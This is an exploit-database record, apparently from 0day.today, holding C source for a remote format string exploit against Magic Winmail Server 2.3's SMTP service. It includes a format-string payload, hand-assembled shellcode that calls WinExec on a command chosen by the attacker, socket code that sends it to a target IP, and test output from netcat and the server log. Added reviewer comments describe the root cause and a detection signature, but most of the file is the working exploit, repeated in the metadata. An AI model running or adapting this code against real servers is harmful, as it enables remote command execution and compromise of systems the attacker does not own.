Winmail Mail Server 2.3 Remote Format String Exploit
2003-06-11T00:00:00
ID 1337DAY-ID-8314 Type zdt Reporter ThreaT Modified 2003-06-11T00:00:00
Description
Exploit for unknown platform in category remote exploits
====================================================
Winmail Mail Server 2.3 Remote Format String Exploit
====================================================
/******************************************************************
* Magic Winmail Server 2.3(Build 0402)
* Remote Format string exploit.
******************************************************************
* Coded by ThreaT.
*
*
* This one takes advantage of a format string bug in the
* >>> SMTP protocol <<< (not pop3) to execute
* a malicious command on a vulnerable system
*
* usage : mwmxploit <Target IP> <command to execute remotely> [smtp port]
* + The command to execute cannot exceed 90 characters +
*
* compile : cl.exe mwmxploit.c /w
*
******************************************************************
*/
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")
/*
 * Entry point of the proof-of-concept.
 *
 *   argv[1]  target IP address (dotted quad, parsed with inet_addr)
 *   argv[2]  command string, at most 90 characters (checked below)
 *   argv[3]  optional SMTP port, default 25
 *
 * Flow: initialise Winsock, open one TCP connection, read the banner,
 * send the format-string payload followed by argv[2] and CRLF, read one
 * more response, exit.  Every error path calls ExitProcess().
 *
 * Reviewer / defender notes (not part of the original):
 *  - The server-side root cause is a printf-style function that receives
 *    the raw SMTP command line as its *format* argument; the smtp.log
 *    excerpt at the end of this file shows "%x" tokens being expanded
 *    into stack contents.  The fix is a fixed format ("%s") whenever
 *    client-supplied text is logged or echoed.
 *  - On the wire this is a single SMTP command line containing "%x",
 *    "%n"/"%hn" conversions and non-printable bytes before the command
 *    text; such lines in SMTP logs or IDS captures are a usable detection
 *    signature for this bug class.
 *  - `void main` is non-standard; `int main` is the portable form.
 */
void main (int argc, char *argv[])
{
SOCKET sock;
char buffer[1000];
int i;  // unused
// overwrite of a saved EIP by means of the format conversions.
// NOTE(review): the literal contains embedded NUL bytes (the Hex Workshop
// dump below starts with \x00), so strlen(vuln) only covers this first
// part; the send() at the bottom adds 92 to account for the rest.
char vuln[] =
"\xec\xfc\x66\x01%x%x"
"\xed\xfc\x66\x01%x%x"
"\xee\xfc\x66\x01"
"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%28x%n"
"%97x%n%105x%hn"
/*
This is my specific shellcode for execute a command
over the Magic Winmail process.
This one can contain null bytes, enjoy ! :)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Disassembly of File: mailserver.exe
Code Offset = 00001000, Code Size = 000CF000
Data Offset = 000EC000, Data Size = 0002E000
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Reference To: KERNEL32.GetModuleHandleA, Ord:0000h
:004B8850 FF15AC014D00 Call dword ptr [004D01AC]
Reference To: KERNEL32.ExitProcess, Ord:0000h
:004B88C6 FF1598014D00 Call dword ptr [004D0198]
Reference To: KERNEL32.GetProcAddress, Ord:0000h
:00406CE7 8B3DEC004D00 mov edi, dword ptr [004D00EC]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
//////////////////////// My shellcode \\\\\\\\\\\\\\\\\\\\\\\\\\
: EB50 jmp 00401058
: 5E pop esi
: 8BEC mov ebp, esp
: 83EC28 sub esp, 00000028 // set up a stack frame
: C745D84B65726E mov [ebp-28], 6E72654B
: C745DC656C3332 mov [ebp-24], 32336C65 // store 'Kernel32' there
: C745E000000000 mov [ebp-20], 00000000
: C745E457696E45 mov [ebp-1C], 456E6957
: C745E878656300 mov [ebp-18], 00636578 // here 'WinExec'
// adapt the shellcode by removing this line if you really need
// 4 more characters for the command to execute
: C645EB00 mov [ebp-15], 00
: BAAC014D00 mov edx, 004D01AC
: 8D45D8 lea eax, dword ptr [ebp-28]
: 50 push eax
: FF12 call dword ptr [edx] // eax = GetModuleHandle ("Kernel32");
: 8D5DE4 lea ebx, dword ptr [ebp-1C]
: 53 push ebx
: 50 push eax
: BAEC004D00 mov edx, 004D00EC
: FF12 call dword ptr [edx] // GetProcAdress (eax, "WinExec");
: 6A01 push 00000001 // 1 = SW_SHOW, 0 = SW_HIDE
: 56 push esi
: FFD0 call eax // WinExec (argv[2], SW_SHOW)
: BA98014D00 mov edx, 004D0198
: FF12 call dword ptr [edx] // ExitProcess ();
: E8ABFFFFFF call 00401008
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ EOF /////////////////////////////////
*/
// Generated by Hex Workshop
// shellcode.exe - Starting Offset: 4102 (0x00001006) Length: 87 (0x00000057)
// 5 bytes of padding + 87 bytes from the dump = the 92 added to strlen() below.
"\x00\x90\x90\x90\x90" // this is so that everything lines up properly
"\xEB\x50\x5E\x8B\xEC\x83\xEC\x28\xC7\x45\xD8\x4B\x65\x72\x6E\xC7"
"\x45\xDC\x65\x6C\x33\x32\xC7\x45\xE0\x00\x00\x00\x00\xC7\x45\xE4"
"\x57\x69\x6E\x45\xC7\x45\xE8\x78\x65\x63\x00\xC6\x45\xEB\x00\xBA"
"\xAC\x01\x4D\x00\x8D\x45\xD8\x50\xFF\x12\x8D\x5D\xE4\x53\x50\xBA"
"\xEC\x00\x4D\x00\xFF\x12\x6A\x01\x56\xFF\xD0\xBA\x98\x01\x4D\x00"
"\xFF\x12\xE8\xAB\xFF\xFF\xFF";
SOCKADDR_IN sin;
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);  // Winsock 2.0
// banner
printf ("* #################################### *\n"
" Magic Winmail Server 2.3(Build 0402)\n"
" Remote format string exploit !\n"
"* #################################### *\n"
" Coded By ThreaT -> ThreaT\n\n");
// argument check: the 90-character limit is the only input validation done.
if (argc < 3 || strlen (argv[2]) > 90)
{
printf ("usage : mwmxploit <Target IP> <command to execute> [smtp port]\n\n"
" + The command to execute cannot exceed 90 characters +\n");
ExitProcess (0);
}
if ( WSAStartup(wVersionRequested, &wsadata) )
{
printf ("Erreur d'initialisation winsock !\n");  // "winsock initialisation error"
ExitProcess (1);
}
sin.sin_family = AF_INET;
// argv[argc] is NULL by the C standard, so reading argv[3] when argc == 3
// is safe.  atoi() does no range check: a non-numeric port becomes 0.
sin.sin_port = htons ((void *)argv[3] ? atoi (argv[3]) : 25);
if ( (sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Erreur : L'adresse IP de la victime est incorrect !\n");  // "invalid target IP address"
ExitProcess (2);
}
printf ("connecting to %s on port %u...", argv[1], ntohs ( sin.sin_port ) );
// NOTE(review): socket() result is not compared against INVALID_SOCKET;
// a failure surfaces only as a failed connect() below.
sock = socket (AF_INET, SOCK_STREAM, 0);
if ( connect (sock, (SOCKADDR *)&sin, sizeof (sin)) )
{
printf ("erreur : connexion impossible !\n");  // "connection failed"
ExitProcess (3);
}
// NOTE(review): the recv() return value is ignored and buffer is never
// NUL-terminated, so the "%s" below may read past the received bytes
// (and past the end of buffer when the server sends 1000 bytes).
recv (sock,buffer,1000,0);
printf ("ok\n-> %s\nsending exploit code...",buffer);
// strlen(vuln) covers the format-string part up to its first NUL; +92 appends
// the padding and the 87-byte dump that follow it in the same literal.
send (sock, vuln, strlen (vuln) + 92, 0); // send the payload
send (sock, argv[2], strlen (argv[2]), 0); // send the command
send (sock, "\r\n", 2, 0); // terminate the SMTP command line
recv (sock,buffer,1000,0); // remote crash :)
puts ("ok");
}
/*
D:\toolz\netcat>nc 127.0.0.1 25
220 M1 Magic Winmail Server 2.3(Build 0402) ESMTP ready
AAAA 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.
8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x
502 unimplemented (#5.5.1)
*/
/*
D:\>type "c:\Program Files\Magic Winmail\server\logs\smtp.log"
0906/Y-01:50:30 1548 Connect from 127.0.0.1
0906/Y-01:51:06 1584 unrecognized command = AAAA 0x00498f71 0x0176fd10
0x0176fe3c 0x000000eb 0x0176ff80 0x00ee6c80 0x00000050 0x00ee60d9 0x00000102
0x0000011f 0x00000050 0x00eecf71 0x0000001c 0x0000001f 0x0176ff74 0x004cd2c0
0x00000001 0x00493e40 0x0176fd50 0x00000000 0x00ee5ea8 0x00ee5ea8 0x41414141
0x25783020 0x2078382e 0x2e257830 0x30207838 0x382e2578 0x78302078 0x78382e25
0x25783020 0x2078382e 0x2e257830
*/
{"hash": "76cb9d0660805ed408f4571b4630b73c9a665717edabda876db6dcc495a6a7f3", "id": "1337DAY-ID-8314", "lastseen": "2018-03-19T03:07:54", "viewCount": 2, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "b7647a0b7e2a3ddaf3a114d109898bc1", "key": "href"}, {"hash": "c7b49bfaaf93f1b2eb7c4eadc9b7e528", "key": "modified"}, {"hash": "c7b49bfaaf93f1b2eb7c4eadc9b7e528", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9b4f5c27a62a56b6820acf39f9c92754", "key": "reporter"}, {"hash": "b7abf0fdd8e5c0b01cf660cf994f0e52", "key": "sourceData"}, {"hash": "392da13b148a43e4bb5e8f2969efd981", "key": "sourceHref"}, {"hash": "7818ba7010b3be65059fe8a0073b5077", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 1.9, "vector": "NONE", "modified": "2018-03-19T03:07:54"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310813649", "OPENVAS:1361412562310813645", "OPENVAS:1361412562310862646"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_JUL_4338829.NASL", "SMB_NT_MS18_JUL_4338815.NASL", "SMB_NT_MS18_JUL_4338818.NASL"]}, {"type": "redhat", "idList": ["RHSA-2013:0566"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/ORACLE/ORACLE_HASHDUMP"]}, {"type": "zdt", "idList": ["1337DAY-ID-6759", "1337DAY-ID-4102", "1337DAY-ID-1584"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:4074"]}], "modified": "2018-03-19T03:07:54"}, "vulnersScore": 1.9}, "type": "zdt", "sourceHref": "https://0day.today/exploit/8314", "description": "Exploit for unknown platform in category remote exploits", "title": "Winmail Mail Server 2.3 
Remote Format String Exploit", "history": [{"bulletin": {"hash": "58a0284dbe088bbdb539fe7cfff8323a7fad69f1f512912361c741943951954b", "id": "1337DAY-ID-8314", "lastseen": "2016-04-20T01:30:17", "enchantments": {"score": {"value": 6.6, "modified": "2016-04-20T01:30:17"}}, "hashmap": [{"hash": "7818ba7010b3be65059fe8a0073b5077", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "9b4f5c27a62a56b6820acf39f9c92754", "key": "reporter"}, {"hash": "788babe8baff0df7a9a482925f972d62", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c1188a9a1f092bd6d0619eba695db2d7", "key": "href"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c7b49bfaaf93f1b2eb7c4eadc9b7e528", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "5aec85fd474854571b2f005ff7ce7917", "key": "sourceHref"}, {"hash": "c7b49bfaaf93f1b2eb7c4eadc9b7e528", "key": "modified"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/8314", "description": "Exploit for unknown platform in category remote exploits", "viewCount": 1, "title": "Winmail Mail Server 2.3 Remote Format String Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "====================================================\r\nWinmail Mail Server 2.3 Remote Format String Exploit\r\n====================================================\r\n\r\n\r\n/******************************************************************\r\n * Magic Winmail Server 2.3(Build 0402) \r\n * Remote Format string exploit.\r\n ******************************************************************\r\n * Coded by ThreaT.\r\n *\r\n *\r\n * This one take advantage of a format bug in the \r\n * >>> 
SMTP protocol <<< (not pop3) for execute\r\n * a malicious command on a vulnerable system\r\n *\r\n * usage : mwmxploit <Target IP> <command to execute remotely> [smtp port]\r\n * + The command to execute cannot exceed 90 characters +\r\n *\r\n * compile : cl.exe mwmxploit.c /w\r\n *\r\n ******************************************************************\r\n*/\r\n\r\n\r\n#include <windows.h>\r\n#include <winsock.h>\r\n\r\n#pragma comment (lib,\"wsock32.lib\")\r\n\r\nvoid main (int argc, char *argv[])\r\n{\r\n\r\n\tSOCKET sock;\r\n\r\n\tchar buffer[1000];\r\n\tint i;\r\n\r\n\t// ecrasement d'un saved EIP gr?ce aux caract?res de format\r\n\tchar vuln[] = \t\t\r\n\t\t\"\\xec\\xfc\\x66\\x01%x%x\"\r\n\t\t\"\\xed\\xfc\\x66\\x01%x%x\"\r\n\t\t\"\\xee\\xfc\\x66\\x01\"\r\n\t\t\r\n\t\t\"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%28x%n\"\r\n\t\t\"%97x%n%105x%hn\"\r\n\r\n/*\r\n\r\n This is my specific shellcode for execute a command\r\n over the Magic Winmail process.\r\n\r\n This one can contain null bytes, enjoy ! 
:)\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\nDisassembly of File: mailserver.exe\r\nCode Offset = 00001000, Code Size = 000CF000\r\nData Offset = 000EC000, Data Size = 0002E000\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n Reference To: KERNEL32.GetModuleHandleA, Ord:0000h\r\n:004B8850 FF15AC014D00 Call dword ptr [004D01AC]\r\n\r\n Reference To: KERNEL32.ExitProcess, Ord:0000h\r\n:004B88C6 FF1598014D00 Call dword ptr [004D0198]\r\n\r\n Reference To: KERNEL32.GetProcAddress, Ord:0000h\r\n:00406CE7 8B3DEC004D00 mov edi, dword ptr [004D00EC]\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\n //////////////////////// My shellcode \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\r\n\r\n: EB50 jmp 00401058\r\n: 5E pop esi\r\n: 8BEC mov ebp, esp\r\n: 83EC28 sub esp, 00000028\t\t// je cree un stack\r\n: C745D84B65726E mov [ebp-28], 6E72654B\r\n: C745DC656C3332 mov [ebp-24], 32336C65 // j'y place 'Kernel32'\r\n: C745E000000000 mov [ebp-20], 00000000\r\n: C745E457696E45 mov [ebp-1C], 456E6957\r\n: C745E878656300 mov [ebp-18], 00636578 // ici 'WinExec'\r\n\r\n// adaptez le shellcode en virant cette ligne si vraiment vous avez besoin \r\n// de 4 caract?res de plus pour la commande ? 
executer\r\n: C645EB00 mov [ebp-15], 00\r\n\t\t\t\t\t\t\t\t\t\t\r\n: BAAC014D00 mov edx, 004D01AC\r\n: 8D45D8 lea eax, dword ptr [ebp-28]\r\n: 50 push eax\r\n: FF12 call dword ptr [edx]\t// eax = GetModuleHandle (\"Kernel32\");\r\n: 8D5DE4 lea ebx, dword ptr [ebp-1C]\r\n: 53 push ebx\r\n: 50 push eax\r\n: BAEC004D00 mov edx, 004D00EC\r\n: FF12 call dword ptr [edx]\t// GetProcAdress (eax, \"WinExec\");\r\n: 6A01 push 00000001\t\t// 1 = SW_SHOW, 0 = SW_HIDE \r\n: 56 push esi\r\n: FFD0 call eax\t\t\t// WinExec (argv[2], SW_SHOW)\r\n: BA98014D00 mov edx, 004D0198\r\n: FF12 call dword ptr [edx]\t// ExitProcess ();\r\n: E8ABFFFFFF call 00401008\t\r\n\r\n \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ EOF /////////////////////////////////\r\n\r\n */\r\n\t\r\n\r\n// Generated by Hex Workshop\r\n// shellcode.exe - Starting Offset: 4102 (0x00001006) Length: 87 (0x00000057)\r\n\r\n\t\"\\x00\\x90\\x90\\x90\\x90\"\t// sa, c'est pour bien coller\r\n\t\"\\xEB\\x50\\x5E\\x8B\\xEC\\x83\\xEC\\x28\\xC7\\x45\\xD8\\x4B\\x65\\x72\\x6E\\xC7\" \r\n\t\"\\x45\\xDC\\x65\\x6C\\x33\\x32\\xC7\\x45\\xE0\\x00\\x00\\x00\\x00\\xC7\\x45\\xE4\" \r\n\t\"\\x57\\x69\\x6E\\x45\\xC7\\x45\\xE8\\x78\\x65\\x63\\x00\\xC6\\x45\\xEB\\x00\\xBA\" \r\n\t\"\\xAC\\x01\\x4D\\x00\\x8D\\x45\\xD8\\x50\\xFF\\x12\\x8D\\x5D\\xE4\\x53\\x50\\xBA\" \r\n\t\"\\xEC\\x00\\x4D\\x00\\xFF\\x12\\x6A\\x01\\x56\\xFF\\xD0\\xBA\\x98\\x01\\x4D\\x00\" \r\n\t\"\\xFF\\x12\\xE8\\xAB\\xFF\\xFF\\xFF\";\r\n\r\n\tSOCKADDR_IN sin;\r\n\tWSADATA wsadata;\r\n\tWORD wVersionRequested = MAKEWORD (2,0);\r\n\r\n\t//\r\n\tprintf (\"* #################################### *\\n\"\r\n\t\t\" Magic Winmail Server 2.3(Build 0402)\\n\"\r\n\t\t\" Remote format string exploit !\\n\"\r\n\t\t\"* #################################### *\\n\"\r\n\t\t\" Coded By ThreaT -> ThreaT\\n\\n\");\r\n\r\n\tif (argc < 3 || strlen (argv[2]) > 90)\r\n\t{\r\n\tprintf (\"usage : mwmxploit <Target IP> <command to execute> [smtp port]\\n\\n\"\r\n\t\t\t\" + The command 
to execute cannot exceed 90 characters +\\n\");\r\n\tExitProcess (0);\r\n\t}\r\n\r\n\tif ( WSAStartup(wVersionRequested, &wsadata) )\r\n\t{\r\n\t\tprintf (\"Erreur d'initialisation winsock !\\n\");\r\n\t\tExitProcess (1);\t\t\r\n\t}\r\n\r\n\tsin.sin_family = AF_INET;\r\n\tsin.sin_port = htons ((void *)argv[3] ? atoi (argv[3]) : 25);\r\n\t\r\n\tif ( (sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)\r\n\t{\r\n\t\tprintf (\"Erreur : L'adresse IP de la victime est incorrect !\\n\");\r\n\t\tExitProcess (2);\r\n\t}\r\n\r\n\tprintf (\"connecting to %s on port %u...\", argv[1], ntohs ( sin.sin_port ) );\r\n\r\n\tsock = socket (AF_INET, SOCK_STREAM, 0);\r\n\tif ( connect (sock, (SOCKADDR *)&sin, sizeof (sin)) )\r\n\t{\r\n\t\tprintf (\"erreur : connexion impossible !\\n\");\r\n\t\tExitProcess (3);\r\n\t}\r\n\r\n\trecv (sock,buffer,1000,0);\r\n\t\r\n\tprintf (\"ok\\n-> %s\\nsending exploit code...\",buffer);\r\n\r\n\tsend (sock, vuln, strlen (vuln) + 92, 0); // envoi du shellcode\r\n\tsend (sock, argv[2], strlen (argv[2]), 0); // envoi de la commande\r\n\tsend (sock, \"\\r\\n\", 2, 0); // validation\r\n\r\n\trecv (sock,buffer,1000,0); // remote crash :)\r\n\r\n\tputs (\"ok\");\r\n}\r\n\r\n/*\r\nD:\\toolz\\netcat>nc 127.0.0.1 25\r\n220 M1 Magic Winmail Server 2.3(Build 0402) ESMTP ready\r\nAAAA 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x \r\n0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.\r\n8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x \r\n0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x\r\n502 unimplemented (#5.5.1)\r\n */\r\n\r\n/*\r\nD:\\>type \"c:\\Program Files\\Magic Winmail\\server\\logs\\smtp.log\"\r\n0906/Y-01:50:30 1548 Connect from 127.0.0.1\r\n0906/Y-01:51:06 1584 unrecognized command = AAAA 0x00498f71 0x0176fd10 \r\n0x0176fe3c 0x000000eb 0x0176ff80 0x00ee6c80 0x00000050 0x00ee60d9 0x00000102 \r\n0x0000011f 0x00000050 0x00eecf71 0x0000001c 0x0000001f 0x0176ff74 0x004cd2c0 \r\n0x00000001 0x00493e40 0x0176fd50 
0x00000000 0x00ee5ea8 0x00ee5ea8 0x41414141 \r\n0x25783020 0x2078382e 0x2e257830 0x30207838 0x382e2578 0x78302078 0x78382e25 \r\n0x25783020 0x2078382e 0x2e257830\r\n\r\n*/\r\n\r\n\r \n\n# 0day.today [2016-04-20] #", "published": "2003-06-11T00:00:00", "references": [], "reporter": "ThreaT", "modified": "2003-06-11T00:00:00", "href": "http://0day.today/exploit/description/8314"}, "lastseen": "2016-04-20T01:30:17", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "====================================================\r\nWinmail Mail Server 2.3 Remote Format String Exploit\r\n====================================================\r\n\r\n\r\n/******************************************************************\r\n * Magic Winmail Server 2.3(Build 0402) \r\n * Remote Format string exploit.\r\n ******************************************************************\r\n * Coded by ThreaT.\r\n *\r\n *\r\n * This one take advantage of a format bug in the \r\n * >>> SMTP protocol <<< (not pop3) for execute\r\n * a malicious command on a vulnerable system\r\n *\r\n * usage : mwmxploit <Target IP> <command to execute remotely> [smtp port]\r\n * + The command to execute cannot exceed 90 characters +\r\n *\r\n * compile : cl.exe mwmxploit.c /w\r\n *\r\n ******************************************************************\r\n*/\r\n\r\n\r\n#include <windows.h>\r\n#include <winsock.h>\r\n\r\n#pragma comment (lib,\"wsock32.lib\")\r\n\r\nvoid main (int argc, char *argv[])\r\n{\r\n\r\n\tSOCKET sock;\r\n\r\n\tchar buffer[1000];\r\n\tint i;\r\n\r\n\t// ecrasement d'un saved EIP gr?ce aux caract?res de format\r\n\tchar vuln[] = \t\t\r\n\t\t\"\\xec\\xfc\\x66\\x01%x%x\"\r\n\t\t\"\\xed\\xfc\\x66\\x01%x%x\"\r\n\t\t\"\\xee\\xfc\\x66\\x01\"\r\n\t\t\r\n\t\t\"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%28x%n\"\r\n\t\t\"%97x%n%105x%hn\"\r\n\r\n/*\r\n\r\n This is my specific shellcode for execute a command\r\n over the Magic Winmail 
process.\r\n\r\n This one can contain null bytes, enjoy ! :)\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\nDisassembly of File: mailserver.exe\r\nCode Offset = 00001000, Code Size = 000CF000\r\nData Offset = 000EC000, Data Size = 0002E000\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n Reference To: KERNEL32.GetModuleHandleA, Ord:0000h\r\n:004B8850 FF15AC014D00 Call dword ptr [004D01AC]\r\n\r\n Reference To: KERNEL32.ExitProcess, Ord:0000h\r\n:004B88C6 FF1598014D00 Call dword ptr [004D0198]\r\n\r\n Reference To: KERNEL32.GetProcAddress, Ord:0000h\r\n:00406CE7 8B3DEC004D00 mov edi, dword ptr [004D00EC]\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\n //////////////////////// My shellcode \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\r\n\r\n: EB50 jmp 00401058\r\n: 5E pop esi\r\n: 8BEC mov ebp, esp\r\n: 83EC28 sub esp, 00000028\t\t// je cree un stack\r\n: C745D84B65726E mov [ebp-28], 6E72654B\r\n: C745DC656C3332 mov [ebp-24], 32336C65 // j'y place 'Kernel32'\r\n: C745E000000000 mov [ebp-20], 00000000\r\n: C745E457696E45 mov [ebp-1C], 456E6957\r\n: C745E878656300 mov [ebp-18], 00636578 // ici 'WinExec'\r\n\r\n// adaptez le shellcode en virant cette ligne si vraiment vous avez besoin \r\n// de 4 caract?res de plus pour la commande ? 
executer\r\n: C645EB00 mov [ebp-15], 00\r\n\t\t\t\t\t\t\t\t\t\t\r\n: BAAC014D00 mov edx, 004D01AC\r\n: 8D45D8 lea eax, dword ptr [ebp-28]\r\n: 50 push eax\r\n: FF12 call dword ptr [edx]\t// eax = GetModuleHandle (\"Kernel32\");\r\n: 8D5DE4 lea ebx, dword ptr [ebp-1C]\r\n: 53 push ebx\r\n: 50 push eax\r\n: BAEC004D00 mov edx, 004D00EC\r\n: FF12 call dword ptr [edx]\t// GetProcAdress (eax, \"WinExec\");\r\n: 6A01 push 00000001\t\t// 1 = SW_SHOW, 0 = SW_HIDE \r\n: 56 push esi\r\n: FFD0 call eax\t\t\t// WinExec (argv[2], SW_SHOW)\r\n: BA98014D00 mov edx, 004D0198\r\n: FF12 call dword ptr [edx]\t// ExitProcess ();\r\n: E8ABFFFFFF call 00401008\t\r\n\r\n \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ EOF /////////////////////////////////\r\n\r\n */\r\n\t\r\n\r\n// Generated by Hex Workshop\r\n// shellcode.exe - Starting Offset: 4102 (0x00001006) Length: 87 (0x00000057)\r\n\r\n\t\"\\x00\\x90\\x90\\x90\\x90\"\t// sa, c'est pour bien coller\r\n\t\"\\xEB\\x50\\x5E\\x8B\\xEC\\x83\\xEC\\x28\\xC7\\x45\\xD8\\x4B\\x65\\x72\\x6E\\xC7\" \r\n\t\"\\x45\\xDC\\x65\\x6C\\x33\\x32\\xC7\\x45\\xE0\\x00\\x00\\x00\\x00\\xC7\\x45\\xE4\" \r\n\t\"\\x57\\x69\\x6E\\x45\\xC7\\x45\\xE8\\x78\\x65\\x63\\x00\\xC6\\x45\\xEB\\x00\\xBA\" \r\n\t\"\\xAC\\x01\\x4D\\x00\\x8D\\x45\\xD8\\x50\\xFF\\x12\\x8D\\x5D\\xE4\\x53\\x50\\xBA\" \r\n\t\"\\xEC\\x00\\x4D\\x00\\xFF\\x12\\x6A\\x01\\x56\\xFF\\xD0\\xBA\\x98\\x01\\x4D\\x00\" \r\n\t\"\\xFF\\x12\\xE8\\xAB\\xFF\\xFF\\xFF\";\r\n\r\n\tSOCKADDR_IN sin;\r\n\tWSADATA wsadata;\r\n\tWORD wVersionRequested = MAKEWORD (2,0);\r\n\r\n\t//\r\n\tprintf (\"* #################################### *\\n\"\r\n\t\t\" Magic Winmail Server 2.3(Build 0402)\\n\"\r\n\t\t\" Remote format string exploit !\\n\"\r\n\t\t\"* #################################### *\\n\"\r\n\t\t\" Coded By ThreaT -> ThreaT\\n\\n\");\r\n\r\n\tif (argc < 3 || strlen (argv[2]) > 90)\r\n\t{\r\n\tprintf (\"usage : mwmxploit <Target IP> <command to execute> [smtp port]\\n\\n\"\r\n\t\t\t\" + The command 
to execute cannot exceed 90 characters +\\n\");\r\n\tExitProcess (0);\r\n\t}\r\n\r\n\tif ( WSAStartup(wVersionRequested, &wsadata) )\r\n\t{\r\n\t\tprintf (\"Erreur d'initialisation winsock !\\n\");\r\n\t\tExitProcess (1);\t\t\r\n\t}\r\n\r\n\tsin.sin_family = AF_INET;\r\n\tsin.sin_port = htons ((void *)argv[3] ? atoi (argv[3]) : 25);\r\n\t\r\n\tif ( (sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)\r\n\t{\r\n\t\tprintf (\"Erreur : L'adresse IP de la victime est incorrect !\\n\");\r\n\t\tExitProcess (2);\r\n\t}\r\n\r\n\tprintf (\"connecting to %s on port %u...\", argv[1], ntohs ( sin.sin_port ) );\r\n\r\n\tsock = socket (AF_INET, SOCK_STREAM, 0);\r\n\tif ( connect (sock, (SOCKADDR *)&sin, sizeof (sin)) )\r\n\t{\r\n\t\tprintf (\"erreur : connexion impossible !\\n\");\r\n\t\tExitProcess (3);\r\n\t}\r\n\r\n\trecv (sock,buffer,1000,0);\r\n\t\r\n\tprintf (\"ok\\n-> %s\\nsending exploit code...\",buffer);\r\n\r\n\tsend (sock, vuln, strlen (vuln) + 92, 0); // envoi du shellcode\r\n\tsend (sock, argv[2], strlen (argv[2]), 0); // envoi de la commande\r\n\tsend (sock, \"\\r\\n\", 2, 0); // validation\r\n\r\n\trecv (sock,buffer,1000,0); // remote crash :)\r\n\r\n\tputs (\"ok\");\r\n}\r\n\r\n/*\r\nD:\\toolz\\netcat>nc 127.0.0.1 25\r\n220 M1 Magic Winmail Server 2.3(Build 0402) ESMTP ready\r\nAAAA 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 